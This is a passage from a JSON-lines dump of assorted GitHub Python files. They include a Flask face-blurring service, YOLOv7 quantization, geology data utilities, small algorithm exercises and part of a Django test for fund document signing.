Iterable too; joining it would split a fullname into characters\n item = \",\".join(item)\n\n if len(item.split(\",\")) > 100 or len(item.split(\",\")) == 0:\n raise ValueError(\"Reddit API /r/[subreddit]/api/info can only return between 0 and 100 items per request.\")\n\n base_url = f\"https://oauth.reddit.com/r/{subreddit}/api/info\"\n response = requests.get(base_url, dict(\n id=item,\n url=url\n ), headers=self._headers())\n\n response.raise_for_status()\n response_dictionary = json.loads(response.content)\n\n posts = [RedditPost.from_json(post[\"data\"]) for post in response_dictionary[\"data\"][\"children\"]]\n return posts","repo_name":"timberhill/reddy","sub_path":"modules/reddit_api.py","file_name":"reddit_api.py","file_ext":"py","file_size_in_byte":7248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23856459997","text":"from flask import Flask, request, Response, jsonify\nfrom flask_cors import CORS\nfrom flask_sock import Sock\nimport base64\nimport cv2\nimport numpy as np\nimport json\n\napp = Flask(__name__)\nCORS(app, resources={r\"/*\": {\"origins\": \"*\"}})\nsock = Sock(app)\n\nface_detector = cv2.FaceDetectorYN_create(\n \"data/face_detection_yunet_2022mar.onnx\",\n \"\",\n (0, 0), # input size\n 0.4, # confidence threshold\n 0.1 # NMS threshold\n)\n\ndef blur_image(image_data, score_threshold=0.4):\n \"\"\" Receives and outputs base64\"\"\"\n image_data = base64.b64decode(image_data.split(\",\")[1])\n\n face_detector.setScoreThreshold(score_threshold)\n img = cv2.imdecode(np.frombuffer(image_data, np.uint8), cv2.IMREAD_COLOR)\n\n channels = 1 if len(img.shape) == 2 else img.shape[2]\n if channels == 1:\n img = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR)\n if channels == 4:\n img = cv2.cvtColor(img, cv2.COLOR_BGRA2BGR)\n\n height, width, _ = img.shape\n face_detector.setInputSize((width, height))\n\n _, faces = 
face_detector.detect(img)\n faces = faces if faces is not None else []\n \n # Blur faces\n for face in faces:\n box = list(map(int, face[:4]))\n x, y, w, h = box\n x = max(0, x)\n y = max(0, y)\n img[y:y+h, x:x+w] = cv2.blur(img[y:y+h, x:x+w], (50, 50), 0)\n\n buf = cv2.imencode('.jpg', img)[1]\n b64 = base64.b64encode(buf).decode()\n return b64\n\n@app.route(\"/upload\", methods=[\"POST\"])\ndef upload():\n image_data = request.json[\"image\"]\n thresh = request.json[\"score_threshold\"]\n if not image_data:\n return Response(\n \"No image given\",\n status=400,\n )\n \n b64 = blur_image(image_data, thresh)\n return jsonify({\"img\": b64})\n\n@sock.route(\"/blur_ws\")\ndef blur_ws(sock):\n while True:\n data = json.loads(sock.receive())\n image_data = data[\"image\"]\n thresh = data[\"score_threshold\"]\n\n if not image_data:\n return Response(\n \"No image given\",\n status=400,\n )\n\n b64 = blur_image(image_data, thresh)\n sock.send(b64)\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=5001, threaded=True, use_reloader=False)\n ","repo_name":"scherjo/blur","sub_path":"blur-flask-app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"37135685354","text":"from csv import DictWriter, DictReader\nfrom copy import deepcopy\nfrom collections import Counter\n\ncode_to_name = {\n \"1.1\": \"Alluvial_Fan\",\n \"1.2\": \"Fluvial_Channel\",\n \"1.3\": \"Fluvial_Point_Bar\",\n \"1.4\": \"Levee\",\n \"1.5\": \"Crevasse_Splay\",\n \"1.6\": \"Fluvial_Floodplain\",\n \"2.1\": \"Progradational_Lacustrine_Delta\",\n \"2.2\": \"Lacustrine_Fan_Delta\",\n \"2.3\": \"Progradational_Lacustrine_Shoreface\",\n \"2.4\": \"Transgressive_Lacustrine_Shoreface\",\n \"2.5\": \"Aggradational_Lacustrine_Shoreface\",\n \"2.6\": \"Lacustrine_Offshore_Transition\",\n \"2.7\": \"Lacustrine_Shelf\",\n \"3.1\": \"Proximal_Sub-Lacustrine_Fan\",\n \"3.2\": \"Distal_Sub-Lacustrine_Fan\",\n \"3.3\": \"Lacustrine_Turbidite\",\n \"3.4\": \"Distal_Lacustrine_Turbidites\",\n \"3.5\": \"Lacustrine_Deepwater\",\n \"4.1\": \"Marine_Delta\",\n \"4.2\": \"Marine_Fan_Delta\",\n \"4.3\": \"Tidal_Channel_And_Sand_Flat\",\n \"4.4\": \"Sandy_Tidal_Flat\",\n \"4.5\": \"Mixed_Tidal_Flat\",\n \"4.6\": \"Muddy_Tidal_Flat\",\n \"4.7\": \"Lagoon\",\n \"5.1\": \"Progradational_Marine_Shoreface\",\n \"5.2\": \"Transgressive_Marine_Shoreface\",\n \"5.3\": \"Aggradational_Marine_Shoreface\",\n \"5.4\": \"Marine_Offshore_Transition\",\n \"5.5\": \"Marine_Shelf\",\n \"6.1\": \"Proximal_Submarine_Fan\",\n \"6.2\": \"Distal_Submarine_Fan\",\n \"6.3\": \"Marine_Turbidite\",\n \"6.4\": \"Distal_Marine_Turbidites\",\n \"6.5\": \"Marine_Deepwater\"\n}\n\ngroups = {\n \"Fluvial\": [\"1.1\", \"1.2\", \"1.3\", \"1.4\", \"1.5\", \"1.6\"],\n \"Shallow_Lacustrine\": [\"2.1\", \"2.2\", \"2.3\", \"2.4\", \"2.5\", \"2.6\", \"2.7\"],\n \"Deep_Lacustrine\": [\"3.1\", \"3.2\", \"3.3\", \"3.4\", \"3.5\"],\n \"Marginal_Marine\": [\"4.1\", \"4.2\", \"4.3\", \"4.4\", \"4.5\", \"4.6\", \"4.7\"],\n \"Shallow_Marine\": [\"5.1\", \"5.2\", \"5.3\", \"5.4\", \"5.5\"],\n \"Deep_Marine\": [\"6.1\", \"6.2\", \"6.3\", \"6.4\", \"6.5\"]\n}\n\n\ndef convert_name_to_number(data):\n tmp = deepcopy(code_to_name)\n tmp.update({\"0\": \"unknown\"})\n for row in data:\n for key, value in row.items():\n if value in tmp.values():\n code = list(tmp.keys())[list(tmp.values()).index(value)]\n row.update({key: code})\n\n\ndef remove_duplicate(arr):\n 
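\"\"\"Sort arr in place, then drop adjacent duplicates so each value appears once.\"\"\"\n    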
arr.sort()\n i = 0\n while i < len(arr) - 1:\n if arr[i] == arr[i + 1]:\n arr.pop(i)\n i -= 1\n i += 1\n return arr\n\n\ndef map_core_depofacies_code_to_name(code):\n try:\n return code_to_name[code]\n except KeyError:\n return None\n\n\ndef convert_string_to_array(string):\n return string[1:-1].split(\", \") if string != '[]' else []\n\n\ndef get_group_depofacies(name):\n try:\n return groups[name]\n except KeyError:\n return None\n\n\ndef get_group_name(facy_name):\n for key, item in code_to_name.items():\n if item == facy_name:\n facy_code = key\n\n for key, item in groups.items():\n if facy_code in item:\n return key\n\n\ndef get_max_by_key(key, data):\n lst = []\n max = 0\n for item in data:\n if int(item[key]) > max:\n max = item[key]\n for item in data:\n if int(item[key]) == max:\n lst.append(item)\n return lst\n\n\ndef update_row_group(group_name, row, point):\n for depofacy in get_group_depofacies(group_name):\n name = map_core_depofacies_code_to_name(depofacy)\n if int(row[name]) > 0:\n if point == \"x\":\n row.update({name: 0})\n else:\n row.update({name: handle_addition(int(row[name]) + point)})\n return row\n\n\ndef convert_unit_by_unit(data):\n lst = []\n lithos = []\n depos = []\n for i in range(0, len(data)):\n if data[i][\"Special_lithology\"] != \"-9999\":\n lithos.append(float(data[i][\"Special_lithology\"]))\n if data[i][\"Core_depofacies\"] != \"-9999\":\n depos.append((float(data[i][\"Core_depofacies\"])))\n if data[i][\"Boundary_flag\"] == \"1\":\n final_litho = deepcopy(remove_duplicate(lithos))\n final_depos = deepcopy(remove_duplicate(depos))\n data[i].update({\"Special_lithology\": final_litho, \"Core_depofacies\": final_depos})\n lst.append(data[i])\n lithos.clear()\n depos.clear()\n\n return lst\n\n\ndef contain_special_lithology(litho):\n if litho == \"[]\" or not litho:\n return False\n return True\n\n\ndef get_key(lst, i):\n return [key for key in lst[i].keys()][0]\n\n\ndef calculate_uncertainty(row):\n if row[\"Most\"] == \"unknown\" or not row[\"Most\"]:\n return 1\n\n if row[\"Second_Most\"] and row[\"Second_Most\"] != \"unknown\" and float(row[row[\"Most\"]]) - float(\n row[row[\"Second_Most\"]]) < 0.1:\n return 1\n\n if row[\"Most\"] and float(row[row[\"Most\"]]) < 0.3:\n return 1\n\n return 0\n\n\ndef export_final(initial_file, filename, data, headers):\n if not headers:\n headers = data[0].keys()\n\n keys = [\"Most\", \"Second_Most\", \"Third_Most\"]\n\n headers.append(\"Sum\")\n headers.append(\"Uncertainty_flag\")\n headers.extend(keys)\n\n for row in data:\n lst = []\n for key, value in code_to_name.items():\n if int(row[value]) != 0:\n lst.append({value: int(row[value])})\n lst = sorted(lst, key=lambda it: it[[key for key in it.keys()][0]], reverse=True)\n for i in range(len(lst) - 1):\n if lst[i][get_key(lst, i)] == lst[i + 1][get_key(lst, i + 1)]:\n lst[i][get_key(lst, i)] = \"unknown\"\n lst[i + 1][get_key(lst, i + 1)] = \"unknown\"\n\n for i in range(len(keys)):\n if len(lst) > i:\n name = [key for key in lst[i].keys()][0]\n if lst[i][name] == \"unknown\" or contain_special_lithology(row[\"Special_lithology\"]):\n row.update({keys[i]: \"unknown\"})\n else:\n row.update({keys[i]: name})\n else:\n row.update({keys[i]: \"\"})\n\n if i == 2:\n break\n\n for row in data:\n row.update({\"Uncertainty_flag\": calculate_uncertainty(row)})\n\n for row in data:\n total = 0\n for key, value in code_to_name.items():\n total += int(row[value])\n row.update({\"Sum\": total})\n\n for row in data:\n for key, value in code_to_name.items():\n if 
int(row[\"Sum\"]) != 0:\n row.update({value: int(row[value]) / int(row[\"Sum\"])})\n\n convert_name_to_number(data)\n\n with open(initial_file) as i_file:\n csv_reader = DictReader(i_file)\n initial_data = list(csv_reader)\n\n with open(filename, \"w\") as o_file:\n csv_writer = DictWriter(o_file, fieldnames=headers)\n csv_writer.writeheader()\n for row in initial_data:\n for header in headers:\n if header not in row:\n row.update({header: data[int(row[\"Unit_index\"])][header]})\n csv_writer.writerow(row)\n\n\ndef export_to_csv(filename, data, headers):\n if not headers:\n headers = data[0].keys()\n with open(filename, \"w\") as o_file:\n csv_writer = DictWriter(o_file, fieldnames=headers)\n csv_writer.writeheader()\n for row in data:\n csv_writer.writerow(row)\n\n\ndef pick_most(data):\n if len(data) == 0:\n return None\n return sorted(data, key=Counter(data).get, reverse=True)[0]\n\n\ndef handle_addition(point):\n if int(point) <= 0:\n return 0\n return int(point)\n","repo_name":"tranhieu956230/ai_i2g","sub_path":"utilites/utils_func.py","file_name":"utils_func.py","file_ext":"py","file_size_in_byte":7335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35422558804","text":"# Quick sort implementation\n\ndef partition(arr, left, right):\n pivot = left\n\n while left < right:\n while (arr[left]) <= arr[pivot]:\n left += 1\n \n while arr[right] > arr[pivot]:\n right -= 1\n\n if left < right:\n temp = arr[left]\n arr[left] = arr[right]\n arr[right] = temp\n\n temp = arr[pivot]\n arr[pivot] = arr[right]\n arr[right] = temp\n \n return right\n\ndef quicksort(arr, left, right):\n if right - left <= 0:\n return\n\n index = partition(arr, left, right)\n\n quicksort(arr, left, index - 1)\n quicksort(arr, index + 1, right)\n\n\narr = [34, 14, 432, 14,124]\n(quicksort(arr, 0, 4))\nprint(arr)\n","repo_name":"ListowelAdolwin/dsa","sub_path":"sorting/quicksort.py","file_name":"quicksort.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21163140606","text":"pizza = {\n\t'crust': 'thick',\n\t'toppings': ['mushroom', 'extra cheese'],\n}\n\n#概述点的比萨\nprint('You ordered a ' + pizza['crust'] + '-crust pizza ' +\n\t'with the following toppings:')\nfor topping in pizza['toppings']:\n\tprint('\\t' + topping)\n\t\ndef make_pizza(size, *toppings):\n\t\"\"\"概述要制作的比萨\"\"\"\n\tprint('\\nMake a ' + str(size) +\n\t\t'-inch pizza with the folling toppings:')\n\tfor topping in toppings:\n\t\tprint('-' + topping)\n\nmake_pizza(16, 'peperoni')\nmake_pizza(12, 'mushroom', 'green peppers', 'extra cheese')","repo_name":"LJZSR/python_work","sub_path":"pizza.py","file_name":"pizza.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44433566538","text":"import torch\nimport logging\nimport os\nimport test\nimport numpy as np\nfrom models.experimental import attempt_load\nfrom utils.datasets import create_dataloader\nfrom utils.general import check_img_size, set_logging, colorstr, increment_path\nimport yaml\nfrom pathlib import Path\nimport argparse\nfrom tqdm import tqdm\nfrom utils.loss import ComputeLoss\n# Define color codes\nGREEN = '\\033[32m'\nRED = '\\033[31m'\nRESET = '\\033[0m'\n\nlogger = logging.getLogger(__name__)\n\nclass Quantization:\n\n def __init__(self, pretrained_weight, backend = 'x86'):\n from models.experimental import Q_model\n\n 
self.device = torch.device(\"cpu\")\n self.pretrained_weight = pretrained_weight\n self.model_fp32 = attempt_load(weights=self.pretrained_weight)\n self.model = Q_model(self.model_fp32)\n self.backend = backend # 'x86' or 'qnnpack'\n logging.info(f\"{GREEN}Quantization Backend: {self.backend}{RESET}\")\n\n def quantize(self, method, dataloader=None):\n\n self.method = method\n\n if self.method == 'psq': # Post static quantization\n self._post_static_quantization(dataloader)\n\n elif self.method == 'qat': # Quantization Aware Training\n pass\n\n else:\n raise ValueError(\"Quantization method should be 'psq' or 'qat'\")\n\n def set_q_config(self):\n\n if self.backend == 'x86': # for x86_64 \n q_config = torch.quantization.get_default_qconfig(\"x86\")\n elif self.backend == 'qnnpack': # for aarch \n q_config = torch.quantization.get_default_qconfig(\"qnnpack\")\n self.model.qconfig = q_config\n\n def load_state_dict(self, weights):\n\n self.set_q_config()\n torch.quantization.prepare(self.model, inplace=True)\n torch.quantization.convert(self.model, inplace=True)\n self.model.load_state_dict(torch.load(weights))\n logging.info(f\"{GREEN}Weights are loaded.{RESET}\")\n\n def _post_static_quantization(self, dataloader):\n\n self.set_q_config()\n self.model.to(self.device).eval()\n\n torch.quantization.prepare(self.model, inplace=True)\n logging.info(GREEN+\"Prepared Post Static Quantization\"+RESET)\n\n self.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n self.model.to(self.device)\n s = f\"Calibrating on {self.device}...\"\n pbar = tqdm(enumerate(dataloader), total=len(dataloader), desc=s) # avoid relying on the global nb defined in __main__\n for i, (imgs, targets, paths, _) in pbar:\n\n imgs = imgs.to(self.device, non_blocking=True).float() / 255.0\n\n with torch.no_grad():\n pred = self.model(imgs)\n\n if opt.debug == True:\n break\n torch.quantization.convert(self.model.to(\"cpu\"), inplace=True)\n logging.info(GREEN+\"Post Static Quantization is Completed!\"+RESET)\n\n self.save()\n\n def save(self):\n \n self.save_path = self.pretrained_weight.replace(\".pt\", \"_\"+ self.method + \".pt\")\n torch.save(self.model.state_dict(), self.save_path)\n logging.info(f'{GREEN}Saved at {self.save_path}\\nModel Size (MB)\\n FP16: {os.path.getsize(self.pretrained_weight)/1e6}\\n INT8: {os.path.getsize(self.save_path)/1e6}{RESET}')\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--weights', type=str, default='runs/train/yolov7/weights/best.pt', help='weights path')\n parser.add_argument('--data', type=str, default='data/VisDrone.yaml', help='data.yaml path')\n parser.add_argument('--batch-size', type=int, default=16, help='total batch size for all GPUs')\n parser.add_argument('--epochs', type=int, default=16, help='total batch size for all GPUs')\n parser.add_argument('--hyp', type=str, default='data/hyp.scratch.p5.yaml', help='hyperparameters path')\n parser.add_argument('--single-cls', action='store_true', help='train multi-class data as single-class')\n parser.add_argument('--img-size', nargs='+', type=int, default=[640, 640], help='[train, test] image sizes')\n parser.add_argument('--cache-images', action='store_true', help='cache images for faster training')\n parser.add_argument('--rect', action='store_true', help='rectangular training')\n parser.add_argument('--workers', type=int, default=8, help='maximum number of dataloader workers')\n parser.add_argument('--image-weights', action='store_true', help='use weighted image selection for training')\n parser.add_argument('--quad', 
action='store_true', help='quad dataloader')\n parser.add_argument('--v5-metric', action='store_true', help='assume maximum recall as 1.0 in AP calculation')\n parser.add_argument('--evolve', action='store_true', help='evolve hyperparameters')\n parser.add_argument('--name', default='exp', help='save to project/name')\n parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')\n parser.add_argument('--project', default='runs/train', help='save to project/name')\n parser.add_argument('--notest', action='store_true', help='only test final epoch') # read below when building the testloader\n parser.add_argument('--debug', action='store_true', help='debugging mode') # type=bool is an argparse footgun: any non-empty string parses as True\n\n opt = parser.parse_args()\n print(opt)\n # Load parameters\n opt.world_size = int(os.environ['WORLD_SIZE']) if 'WORLD_SIZE' in os.environ else 1\n opt.global_rank = int(os.environ['RANK']) if 'RANK' in os.environ else -1\n set_logging(opt.global_rank)\n\n with open(opt.data) as f:\n data_dict = yaml.load(f, Loader=yaml.SafeLoader) # data dict\n train_path = data_dict['train']\n test_path = data_dict['val']\n \n opt.save_dir = increment_path(Path(opt.project) / opt.name, exist_ok=opt.exist_ok | opt.evolve) # increment run\n save_dir, epochs, batch_size, weights, rank= \\\n Path(opt.save_dir), opt.epochs, opt.batch_size, opt.weights, opt.global_rank\n \n opt.total_batch_size = opt.batch_size\n total_batch_size = opt.total_batch_size\n \n # Hyperparameters\n with open(opt.hyp) as f:\n hyp = yaml.load(f, Loader=yaml.SafeLoader) # load hyps \n\n # Load a Pretrained Model and Create a Quantized Model\n device = torch.device(\"cpu\")\n nc = 1 if opt.single_cls else int(data_dict['nc']) # number of classes\n\n Q = Quantization(weights)\n model = attempt_load(weights, map_location=device)\n\n # Trainloader\n gs = max(int(model.stride.max()), 32) # grid size (max stride)\n nl = model.model[-1].nl # number of detection layers (used for scaling hyp['obj'])\n imgsz, imgsz_test = [check_img_size(x, gs) for x in opt.img_size] # verify imgsz are gs-multiples\n\n dataloader, dataset = create_dataloader(train_path, imgsz, batch_size, gs, opt,\n hyp=hyp, augment=True, cache=opt.cache_images, rect=opt.rect, rank=rank,\n world_size=opt.world_size, workers=opt.workers,\n image_weights=opt.image_weights, quad=opt.quad, prefix=colorstr('train: '))\n mlc = np.concatenate(dataset.labels, 0)[:, 0].max() # max label class\n nb = len(dataloader) # number of batches\n\n testloader = create_dataloader(test_path, imgsz_test, batch_size * 2, gs, opt, # testloader\n hyp=hyp, cache=opt.cache_images and not opt.notest, rect=True, rank=-1,\n world_size=opt.world_size, workers=opt.workers,\n pad=0.5, prefix=colorstr('val: '))[0]\n\n logger.info(('\\n' + '%10s' * 8) % ('Epoch', 'gpu_mem', 'box', 'obj', 'cls', 'total', 'labels', 'img_size'))\n assert mlc < nc, 'Label class %g exceeds nc=%g in %s. 
Possible class labels are 0-%g' % (mlc, nc, opt.data, nc - 1)\n compute_loss = ComputeLoss(model) # init loss class\n\n # Quantization\n Q.quantize('psq', dataloader= dataloader)\n \n Q2 = Quantization(pretrained_weight=weights)\n Q2.load_state_dict('runs/train/yolov7/weights/best_psq.pt')\n \n # print(Q.model)\n\n # print(type(Q.model))\n\n # #Q.model.eval()\n\n # random_input = np.random.random((1,3,640,640)).astype(np.float32)\n\n # Q.model(torch.Tensor(random_input))","repo_name":"vivekdevre/YOLOv7_VisDrone","sub_path":"quantize.py","file_name":"quantize.py","file_ext":"py","file_size_in_byte":8062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"71818284008","text":"class BasicStatusCode(object):\n SERVER_ERROR = {\n 'code': 1001,\n 'message': \"An unknown server error occurred\"\n }\n DATABASE_ERROR = {\n 'code': 1002,\n 'message': 'An unknown database error occurred'\n }\n INVALID_ARGS = {\n 'code': 1003,\n 'message': 'Invalid arguments'\n }\n TIMEOUT_ERROR = {\n 'code': 1004,\n 'message': 'Timeout error'\n }\n\n\n# Status codes and messages returned by the user module\nclass UserStatusCode(BasicStatusCode):\n PASSWORD_ERROR = {\n 'code': 2001\n }\n EXISTED_ERROR = {\n 'code': 2002\n }\n NOT_EXIST_ERROR = {\n 'code': 2003\n }\n WRONG_PWD_OR_ACCOUNT = {\n 'code': 2004,\n 'message': 'Incorrect username or password'\n }\n INVALID_USER_ID = {\n 'code': 2005,\n 'message': 'Invalid user_id'\n }\n PERMISSION_NOT_ALLOW = {\n 'code': 2006,\n 'message': 'Permission denied'\n }","repo_name":"zzzzzzzzs/flask_web_application","sub_path":"utils/status_code.py","file_name":"status_code.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19640318094","text":"import numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\n\r\nLAMBDA = 0.001\r\n\r\n\r\n# ======================\r\n\r\ndef preprocess(data):\r\n x1 = data[:, [0]]\r\n x2 = data[:, [1]]\r\n y = data[:, [2]]\r\n\r\n x1_mean = np.mean(x1)\r\n x2_mean = np.mean(x2)\r\n y_mean = np.mean(y)\r\n x1_std = np.std(x1)\r\n x2_std = np.std(x2)\r\n y_std = np.std(y)\r\n\r\n x1 = (x1 - x1_mean) / x1_std\r\n x2 = (x2 - x2_mean) / x2_std\r\n y = (y - y_mean) / y_std\r\n\r\n bias = np.expand_dims(np.ones([len(x1)]), axis=1)\r\n X = np.append(bias, x1, axis=1)\r\n X = np.append(X, x2, axis=1)\r\n\r\n\r\n return X, y\r\n\r\n\r\ndef rsquare(h_x,y):\r\n SST=0\r\n SSR=0\r\n y_bar=np.mean(y,axis=0)\r\n for i in range(len(y)):\r\n SST=SST+ (y[i]-y_bar)**2\r\n SSR=SSR+ (h_x[i]-y_bar)**2\r\n rsquare= SSR/SST\r\n return rsquare\r\n\r\n\r\n\r\ndef del_j(h_x, X, y, idx):\r\n del_j = 0\r\n\r\n for i in range(len(y)):\r\n del_j += (h_x[i] - y[i]) * X[i, idx]\r\n\r\n return del_j\r\n\r\n\r\n\r\ndef compute_J(h_x, y):\r\n m = np.shape(h_x)[0]\r\n temp = h_x - y\r\n J = (1 / (2 * m)) * (np.sum(temp ** 2))\r\n\r\n\r\n return J\r\n\r\n\r\ndef batch_grad(data, alpha=2e-8, epsilon=2e-10):\r\n X, y = preprocess(data)\r\n cost_value = []\r\n W = np.zeros([3, 1])\r\n w1 = []\r\n w2 = []\r\n eps = np.Inf\r\n\r\n epochs = 1000\r\n ep = 0\r\n h_x = np.dot(X, W)\r\n\r\n\r\n while (eps > epsilon) and (ep < epochs):\r\n print(ep)\r\n\r\n for j in range(len(W)):\r\n W[j] = W[j] - alpha * (del_j(h_x, X, y, j))\r\n\r\n w1.append(W[1, 0])\r\n w2.append(W[2, 0])\r\n\r\n h_x = np.dot(X, W)\r\n cost_value.append(compute_J(h_x, y))\r\n ep += 1\r\n\r\n if (len(cost_value) > 1):\r\n eps = np.abs(cost_value[-1] - cost_value[-2])\r\n\r\n print(cost_value)\r\n\r\n return cost_value, W, w1, w2,h_x\r\n\r\n\r\ndata_ = pd.read_csv('data.txt', header=None)\r\ndata_ = 
np.array(data_)\r\ndata=data_[:,1:]\r\n# data=rand(data_)\r\ntarget=data[:,2]\r\ntarget=(target-np.mean(target))/np.std(target)\r\nprint(np.mean(target,axis=0))\r\nnp.random.shuffle(data)\r\nALPHA = 1e-7\r\nX,y=preprocess(data)\r\nvalues, w, w1, w2,h_x = batch_grad(data, alpha=ALPHA)\r\nSE=compute_J(h_x,y)\r\nRMSE=SE**0.5\r\nrsquared=rsquare(h_x,y)\r\nprint('W values ', w)\r\n# print(len(values))\r\nprint(\"rsquare:\",rsquared)\r\nprint(\"RMSE\",RMSE)\r\nplt.plot(values)\r\nplt.title('Cost vs Iteration')\r\nplt.xlabel('Iteration')\r\nplt.ylabel('Cost')\r\nplt.show()\r\n\r\n","repo_name":"PandaBoi/FODS_Assignment","sub_path":"Assignment 1-20191124T022613Z-001/Assignment 1/Batch.py","file_name":"Batch.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73030018409","text":"import sys\ninput = sys.stdin.readline\nfrom collections import deque\n\nn, m = map(int, input().split())\ndata = [list(map(int, input().rstrip())) for _ in range(n)]\nqueue = deque()\nqueue.append((0, 0))\n\ndx = [-1, 1, 0, 0]\ndy = [0, 0, -1, 1]\n\nwhile queue:\n x, y = queue.popleft()\n\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n\n if 0 <= nx < n and 0 <= ny < m:\n if data[nx][ny] == 1:\n data[nx][ny] = data[x][y] + 1\n queue.append((nx, ny))\n\nprint(data[n-1][m-1])","repo_name":"CHOSIYEON/Algorithms","sub_path":"BAEKJOON/DFSㆍBFS/2178.미로 탐색.py","file_name":"2178.미로 탐색.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8825455544","text":"from api.funds.models import DocumentFilter\nfrom api.libs.docusign.services import DocumentSigningService\nfrom api.tax_records.tests.factories import TaxRecordFactory, TaxFormFactory\nfrom core.base_tests import BaseTestCase\nfrom slugify import slugify\n\nfrom api.admin_users.tests.factories import AdminUserFactory\nfrom api.documents.tests.factories import DocumentFactory\nfrom api.partners.tests.factories import WorkFlowFactory, UserFactory\nfrom api.kyc_records.tests.factories import KYCRecordFactory, CardWorkFlowFactory\nfrom api.kyc_records.models import KYCRecord\nfrom api.workflows.models import Task\nfrom api.cards.default.workflow_types import WorkflowTypes\nfrom api.workflows.models import WorkFlow\nfrom api.cards.models import Workflow as CardWorkFlow\nfrom api.documents.models import FundDocument\nfrom api.agreements.services.create_applicant_agreement_documents import CreateApplicantAgreementDocument\nfrom api.agreements.services.application_data.get_application_values import GetApplicationValuesService\nfrom api.workflows.services.user_on_boarding_workflow import UserOnBoardingWorkFlowService\nfrom api.funds.services.gp_signing_service import GPSigningService\n\n\nclass TestGpSigningTasks(BaseTestCase):\n def setUp(self) -> None:\n self.create_company()\n self.create_user()\n self.create_card_workflow(company=self.company)\n self.setup_fund(company=self.company)\n self.client.force_authenticate(self.user)\n self.create_currency()\n self.admin_user = AdminUserFactory(company=self.company, user=self.user)\n\n def setup_application(self, kyc_record, tax_record=None):\n application = self.create_application(\n fund=self.fund,\n company_user=self.company_user,\n kyc_record=kyc_record,\n tax_record=tax_record\n )\n return application\n\n def create_fund_document(self, require_signature=True, require_gp_sign=False, signer=None):\n document = 
DocumentFactory(\n document_path=self.create_document_path(),\n company=self.company\n )\n fund_document = FundDocument.objects.create(\n document=document,\n fund=self.fund,\n require_signature=require_signature,\n require_gp_signature=require_gp_sign,\n gp_signer=signer\n )\n return fund_document\n\n def setup_kyc_record(self, user):\n name = \"{} {}\".format(WorkflowTypes.TRUST.value, self.company.name)\n workflow = CardWorkFlow.objects.get(\n slug=slugify(name),\n company=self.company,\n )\n kyc_record = KYCRecordFactory(company=self.company, user=user, workflow=workflow, company_user=self.company_user)\n return kyc_record\n\n def setup_tax_record(self, user):\n tax_record = TaxRecordFactory.create(company=self.company, user=user, us_holder=True)\n return tax_record\n\n def get_field(self, fields, field_id):\n for field in fields:\n if field['id'] == field_id:\n return field\n\n return {}\n\n def test_docu_sign_envelop_without_gp_signer(self):\n kyc_record = self.setup_kyc_record(user=self.user)\n application = self.setup_application(kyc_record=kyc_record)\n fund_document = self.create_fund_document()\n\n subscription_document_service = CreateApplicantAgreementDocument(application=application)\n envelop = subscription_document_service.get_envelope_payload(fund_agreement_document=fund_document)\n tabs = envelop['signers'][0]['data_tabs'][\"text_tabs\"]\n\n # assert signer details\n self.assertEqual(len(envelop['signers']), 1)\n self.assertEqual(envelop['signers'][0]['role_name'], 'applicant')\n self.assertEqual(envelop['signers'][0]['signer_email'], application.user.email)\n # assert task details\n self.assertEqual(self.get_field(tabs, 'aml-kyc-first_name')['value'], kyc_record.first_name)\n self.assertEqual(self.get_field(tabs, 'aml-kyc-last_name')['value'], kyc_record.last_name)\n\n def test_docu_sign_envelop_with_gp_signer(self):\n kyc_record = self.setup_kyc_record(user=self.user)\n application = self.setup_application(kyc_record=kyc_record)\n fund_document = self.create_fund_document(require_gp_sign=True, signer=self.admin_user)\n\n subscription_document_service = CreateApplicantAgreementDocument(application=application)\n envelop = subscription_document_service.get_envelope_payload(fund_agreement_document=fund_document)\n tabs = envelop['signers'][0]['data_tabs'][\"text_tabs\"]\n\n # assert signer details\n self.assertEqual(len(envelop['signers']), 2)\n self.assertEqual(envelop['signers'][0]['role_name'], 'applicant')\n self.assertEqual(envelop['signers'][0]['signer_email'], application.user.email)\n self.assertEqual(envelop['signers'][1]['role_name'], 'gp_signer')\n self.assertEqual(envelop['signers'][1]['signer_email'], self.admin_user.user.email)\n # assert tab details\n self.assertEqual(self.get_field(tabs, 'aml-kyc-first_name')['value'], kyc_record.first_name)\n self.assertEqual(self.get_field(tabs, 'aml-kyc-last_name')['value'], kyc_record.last_name)\n self.assertEqual(self.get_field(tabs, 'fund-gp_signer_name')['value'],\n f'{self.admin_user.user.first_name} {self.admin_user.user.last_name}'.strip())\n self.assertEqual(self.get_field(tabs, 'fund-gp_signer_title')['value'], self.admin_user.title)\n\n def test_create_envelope_with_gp_signer(self):\n kyc_record = self.setup_kyc_record(user=self.user)\n tax_record = self.setup_tax_record(user=self.user)\n application = self.setup_application(kyc_record=kyc_record, tax_record=tax_record)\n fund_document = self.create_fund_document(require_gp_sign=True, signer=self.admin_user)\n\n code = \"\"\"\n set aml-kyc-citizenship_country = 
